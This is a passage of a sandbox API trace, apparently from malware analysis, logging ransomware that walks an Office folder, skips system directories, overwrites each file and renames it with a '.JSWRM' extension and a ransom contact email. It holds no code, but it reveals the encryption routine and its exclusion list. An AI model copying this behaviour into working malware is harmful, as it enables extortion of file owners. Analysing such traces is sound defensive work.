CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SIDEBARBB.DPV", cchWideChar=13, lpMultiByteStr=0x345ebd8, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SIDEBARBB.DPV", lpUsedDefaultChar=0x0) returned 13 [0143.320] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SIDEBARBB.DPV", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0143.320] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SIDEBARBB.DPV", cchWideChar=13, lpMultiByteStr=0x345eba8, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SIDEBARBB.DPV", lpUsedDefaultChar=0x0) returned 13 [0143.320] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0143.320] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0143.320] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PUBWIZ\\SIDEBARBB.DPV" (normalized: "c:\\program files\\microsoft office\\root\\office16\\pubwiz\\sidebarbb.dpv"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0143.322] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=312537) returned 1 [0143.322] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0143.322] ReadFile (in: hFile=0x238, lpBuffer=0x2501e8, nNumberOfBytesToRead=0x27100, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x2501e8*, lpNumberOfBytesRead=0x345e89c*=0x27100, lpOverlapped=0x0) returned 1 [0143.335] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0143.335] WriteFile (in: hFile=0x238, lpBuffer=0x2501e8*, nNumberOfBytesToWrite=0x27100, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x2501e8*, lpNumberOfBytesWritten=0x345e898*=0x27100, lpOverlapped=0x0) returned 1 [0143.336] CloseHandle (hObject=0x238) returned 1 [0143.336] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PUBWIZ\\SIDEBARBB.DPV" (normalized: "c:\\program files\\microsoft office\\root\\office16\\pubwiz\\sidebarbb.dpv"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PUBWIZ\\SIDEBARBB.DPV.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\pubwiz\\sidebarbb.dpv.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0143.338] FindNextFileW (in: hFindFile=0x232040, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x23598a6d, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x23598a6d, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x2373c469, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0xb08a, dwReserved0=0xf12e0, dwReserved1=0x0, cFileName="SIDEBARBB.POC", cAlternateFileName="SIDEBA~2.POC")) returned 1 [0143.338] lstrcmpiW (lpString1="SIDEBARBB.POC", lpString2=".") returned 1 [0143.338] lstrcmpiW (lpString1="SIDEBARBB.POC", lpString2="..") returned 1 [0143.338] lstrcmpiW (lpString1="SIDEBARBB.POC", lpString2="...") returned 1 [0143.338] lstrcmpiW (lpString1="SIDEBARBB.POC", lpString2="windows") returned -1 [0143.338] lstrcmpiW (lpString1="SIDEBARBB.POC", lpString2="recovery") returned 1 [0143.338] lstrcmpiW (lpString1="SIDEBARBB.POC", lpString2="perflogs") returned 1 [0143.338] lstrcmpiW (lpString1="SIDEBARBB.POC", lpString2="documents and settings") returned 1 [0143.338] lstrcmpiW (lpString1="SIDEBARBB.POC", lpString2="$RECYCLE.BIN") returned 1 [0143.338] lstrcmpiW (lpString1="SIDEBARBB.POC", lpString2="system volume information") returned -1 [0143.338] lstrcmpiW (lpString1="SIDEBARBB.POC", lpString2="msocache") returned 1 [0143.338] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SIDEBARBB.POC", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0143.338] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SIDEBARBB.POC", cchWideChar=13, lpMultiByteStr=0x345ebd8, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SIDEBARBB.POC", lpUsedDefaultChar=0x0) returned 13 [0143.338] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SIDEBARBB.POC", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0143.338] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SIDEBARBB.POC", cchWideChar=13, lpMultiByteStr=0x345eba8, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SIDEBARBB.POC", lpUsedDefaultChar=0x0) returned 13 [0143.338] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0143.338] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0143.338] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PUBWIZ\\SIDEBARBB.POC" (normalized: "c:\\program files\\microsoft office\\root\\office16\\pubwiz\\sidebarbb.poc"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0143.339] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=45194) returned 1 [0143.339] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0143.339] ReadFile (in: hFile=0x238, lpBuffer=0x27b348, nNumberOfBytesToRead=0xb080, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x27b348*, lpNumberOfBytesRead=0x345e89c*=0xb080, lpOverlapped=0x0) returned 1 [0143.343] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0143.343] WriteFile (in: hFile=0x238, lpBuffer=0x27b348*, nNumberOfBytesToWrite=0xb080, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x27b348*, lpNumberOfBytesWritten=0x345e898*=0xb080, lpOverlapped=0x0) returned 1 [0143.343] CloseHandle (hObject=0x238) returned 1 [0143.344] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PUBWIZ\\SIDEBARBB.POC" (normalized: "c:\\program files\\microsoft office\\root\\office16\\pubwiz\\sidebarbb.poc"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PUBWIZ\\SIDEBARBB.POC.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\pubwiz\\sidebarbb.poc.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0143.345] FindNextFileW (in: hFindFile=0x232040, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x235000fc, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x235000fc, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x2373c469, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x49e01, dwReserved0=0xf12e0, dwReserved1=0x0, cFileName="SIDEBARVERTBB.DPV", cAlternateFileName="SIDEBA~1.DPV")) returned 1 [0143.345] lstrcmpiW (lpString1="SIDEBARVERTBB.DPV", lpString2=".") returned 1 [0143.345] lstrcmpiW (lpString1="SIDEBARVERTBB.DPV", lpString2="..") returned 1 [0143.345] lstrcmpiW (lpString1="SIDEBARVERTBB.DPV", lpString2="...") returned 1 [0143.345] lstrcmpiW (lpString1="SIDEBARVERTBB.DPV", lpString2="windows") returned -1 [0143.345] lstrcmpiW (lpString1="SIDEBARVERTBB.DPV", lpString2="recovery") returned 1 [0143.345] lstrcmpiW (lpString1="SIDEBARVERTBB.DPV", lpString2="perflogs") returned 1 [0143.345] lstrcmpiW (lpString1="SIDEBARVERTBB.DPV", lpString2="documents and settings") returned 1 [0143.345] lstrcmpiW (lpString1="SIDEBARVERTBB.DPV", lpString2="$RECYCLE.BIN") returned 1 [0143.345] lstrcmpiW (lpString1="SIDEBARVERTBB.DPV", lpString2="system volume information") returned -1 [0143.345] lstrcmpiW (lpString1="SIDEBARVERTBB.DPV", lpString2="msocache") returned 1 [0143.345] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SIDEBARVERTBB.DPV", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0143.345] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SIDEBARVERTBB.DPV", cchWideChar=17, lpMultiByteStr=0x241308, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SIDEBARVERTBB.DPV", lpUsedDefaultChar=0x0) returned 17 [0143.345] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SIDEBARVERTBB.DPV", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0143.345] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SIDEBARVERTBB.DPV", cchWideChar=17, lpMultiByteStr=0x241010, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SIDEBARVERTBB.DPV", lpUsedDefaultChar=0x0) returned 17 [0143.345] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0143.345] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0143.345] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PUBWIZ\\SIDEBARVERTBB.DPV" (normalized: "c:\\program files\\microsoft office\\root\\office16\\pubwiz\\sidebarvertbb.dpv"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0143.346] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=302593) returned 1 [0143.346] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0143.346] ReadFile (in: hFile=0x238, lpBuffer=0x2501e8, nNumberOfBytesToRead=0x27100, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x2501e8*, lpNumberOfBytesRead=0x345e89c*=0x27100, lpOverlapped=0x0) returned 1 [0143.368] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0143.368] WriteFile (in: hFile=0x238, lpBuffer=0x2501e8*, nNumberOfBytesToWrite=0x27100, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x2501e8*, lpNumberOfBytesWritten=0x345e898*=0x27100, lpOverlapped=0x0) returned 1 [0143.368] CloseHandle (hObject=0x238) returned 1 [0143.368] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PUBWIZ\\SIDEBARVERTBB.DPV" (normalized: "c:\\program files\\microsoft office\\root\\office16\\pubwiz\\sidebarvertbb.dpv"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PUBWIZ\\SIDEBARVERTBB.DPV.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\pubwiz\\sidebarvertbb.dpv.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0143.370] FindNextFileW (in: hFindFile=0x232040, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x235000fc, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x235000fc, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x23526361, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0xa71a, dwReserved0=0xf12e0, dwReserved1=0x0, cFileName="SIDEBARVERTBB.POC", cAlternateFileName="SIDEBA~1.POC")) returned 1 [0143.370] lstrcmpiW (lpString1="SIDEBARVERTBB.POC", lpString2=".") returned 1 [0143.370] lstrcmpiW (lpString1="SIDEBARVERTBB.POC", lpString2="..") returned 1 [0143.370] lstrcmpiW (lpString1="SIDEBARVERTBB.POC", lpString2="...") returned 1 [0143.371] lstrcmpiW (lpString1="SIDEBARVERTBB.POC", lpString2="windows") returned -1 [0143.371] lstrcmpiW (lpString1="SIDEBARVERTBB.POC", lpString2="recovery") returned 1 [0143.371] lstrcmpiW (lpString1="SIDEBARVERTBB.POC", lpString2="perflogs") returned 1 [0143.371] lstrcmpiW (lpString1="SIDEBARVERTBB.POC", lpString2="documents and settings") returned 1 [0143.371] lstrcmpiW (lpString1="SIDEBARVERTBB.POC", lpString2="$RECYCLE.BIN") returned 1 [0143.371] lstrcmpiW (lpString1="SIDEBARVERTBB.POC", lpString2="system volume information") returned -1 [0143.371] lstrcmpiW (lpString1="SIDEBARVERTBB.POC", lpString2="msocache") returned 1 [0143.371] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SIDEBARVERTBB.POC", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0143.371] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SIDEBARVERTBB.POC", cchWideChar=17, lpMultiByteStr=0x2411c8, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SIDEBARVERTBB.POC", lpUsedDefaultChar=0x0) returned 17 [0143.371] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SIDEBARVERTBB.POC", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0143.371] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SIDEBARVERTBB.POC", cchWideChar=17, lpMultiByteStr=0x240f48, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SIDEBARVERTBB.POC", lpUsedDefaultChar=0x0) returned 17 [0143.371] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0143.371] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0143.371] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PUBWIZ\\SIDEBARVERTBB.POC" (normalized: "c:\\program files\\microsoft office\\root\\office16\\pubwiz\\sidebarvertbb.poc"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0143.372] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=42778) returned 1 [0143.372] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0143.372] ReadFile (in: hFile=0x238, lpBuffer=0x27b348, nNumberOfBytesToRead=0xa710, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x27b348*, lpNumberOfBytesRead=0x345e89c*=0xa710, lpOverlapped=0x0) returned 1 [0143.389] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0143.389] WriteFile (in: hFile=0x238, lpBuffer=0x27b348*, nNumberOfBytesToWrite=0xa710, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x27b348*, lpNumberOfBytesWritten=0x345e898*=0xa710, lpOverlapped=0x0) returned 1 [0143.389] CloseHandle (hObject=0x238) returned 1 [0143.389] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PUBWIZ\\SIDEBARVERTBB.POC" (normalized: "c:\\program files\\microsoft office\\root\\office16\\pubwiz\\sidebarvertbb.poc"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PUBWIZ\\SIDEBARVERTBB.POC.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\pubwiz\\sidebarvertbb.poc.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0143.390] FindNextFileW (in: hFindFile=0x232040, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x235000fc, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x235000fc, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x23526361, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x17e95, dwReserved0=0xf12e0, dwReserved1=0x0, cFileName="SIGN.DPV", cAlternateFileName="")) returned 1 [0143.390] lstrcmpiW (lpString1="SIGN.DPV", lpString2=".") returned 1 [0143.390] lstrcmpiW (lpString1="SIGN.DPV", lpString2="..") returned 1 [0143.390] lstrcmpiW (lpString1="SIGN.DPV", lpString2="...") returned 1 [0143.391] lstrcmpiW (lpString1="SIGN.DPV", lpString2="windows") returned -1 [0143.391] lstrcmpiW (lpString1="SIGN.DPV", lpString2="recovery") returned 1 [0143.391] lstrcmpiW (lpString1="SIGN.DPV", lpString2="perflogs") returned 1 [0143.391] lstrcmpiW (lpString1="SIGN.DPV", lpString2="documents and settings") returned 1 [0143.391] lstrcmpiW (lpString1="SIGN.DPV", lpString2="$RECYCLE.BIN") returned 1 [0143.391] lstrcmpiW (lpString1="SIGN.DPV", lpString2="system volume information") returned -1 [0143.391] lstrcmpiW (lpString1="SIGN.DPV", lpString2="msocache") returned 1 [0143.391] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SIGN.DPV", cchWideChar=8, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8 [0143.391] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SIGN.DPV", cchWideChar=8, lpMultiByteStr=0x345ebd8, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SIGN.DPV", lpUsedDefaultChar=0x0) returned 8 [0143.391] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SIGN.DPV", cchWideChar=8, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8 [0143.391] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SIGN.DPV", cchWideChar=8, lpMultiByteStr=0x345eba8, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SIGN.DPV", lpUsedDefaultChar=0x0) returned 8 [0143.391] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0143.391] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0143.391] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PUBWIZ\\SIGN.DPV" (normalized: "c:\\program files\\microsoft office\\root\\office16\\pubwiz\\sign.dpv"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0143.392] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=97941) returned 1 [0143.392] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0143.392] ReadFile (in: hFile=0x238, lpBuffer=0x2501e8, nNumberOfBytesToRead=0x17e90, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x2501e8*, lpNumberOfBytesRead=0x345e89c*=0x17e90, lpOverlapped=0x0) returned 1 [0143.399] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0143.399] WriteFile (in: hFile=0x238, lpBuffer=0x2501e8*, nNumberOfBytesToWrite=0x17e90, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x2501e8*, lpNumberOfBytesWritten=0x345e898*=0x17e90, lpOverlapped=0x0) returned 1 [0143.400] CloseHandle (hObject=0x238) returned 1 [0143.400] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PUBWIZ\\SIGN.DPV" (normalized: "c:\\program files\\microsoft office\\root\\office16\\pubwiz\\sign.dpv"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PUBWIZ\\SIGN.DPV.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\pubwiz\\sign.dpv.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0143.401] FindNextFileW (in: hFindFile=0x232040, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x235000fc, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x235000fc, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x237aeb7f, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x2ab4, dwReserved0=0xf12e0, dwReserved1=0x0, cFileName="SIGN.XML", cAlternateFileName="")) returned 1 [0143.401] lstrcmpiW (lpString1="SIGN.XML", lpString2=".") returned 1 [0143.401] lstrcmpiW (lpString1="SIGN.XML", lpString2="..") returned 1 [0143.401] lstrcmpiW (lpString1="SIGN.XML", lpString2="...") returned 1 [0143.401] lstrcmpiW (lpString1="SIGN.XML", lpString2="windows") returned -1 [0143.401] lstrcmpiW (lpString1="SIGN.XML", lpString2="recovery") returned 1 [0143.401] lstrcmpiW (lpString1="SIGN.XML", lpString2="perflogs") returned 1 [0143.401] lstrcmpiW (lpString1="SIGN.XML", lpString2="documents and settings") returned 1 [0143.401] lstrcmpiW (lpString1="SIGN.XML", lpString2="$RECYCLE.BIN") returned 1 [0143.401] lstrcmpiW (lpString1="SIGN.XML", lpString2="system volume information") returned -1 [0143.401] lstrcmpiW (lpString1="SIGN.XML", lpString2="msocache") returned 1 [0143.401] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SIGN.XML", cchWideChar=8, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8 [0143.401] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SIGN.XML", cchWideChar=8, lpMultiByteStr=0x345ebd8, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SIGN.XML", lpUsedDefaultChar=0x0) returned 8 [0143.401] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SIGN.XML", cchWideChar=8, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8 [0143.401] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SIGN.XML", cchWideChar=8, lpMultiByteStr=0x345eba8, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SIGN.XML", lpUsedDefaultChar=0x0) returned 8 [0143.401] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0143.401] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0143.401] CreateFileW (lpFileName="C:\\Program Files\\Microsoft 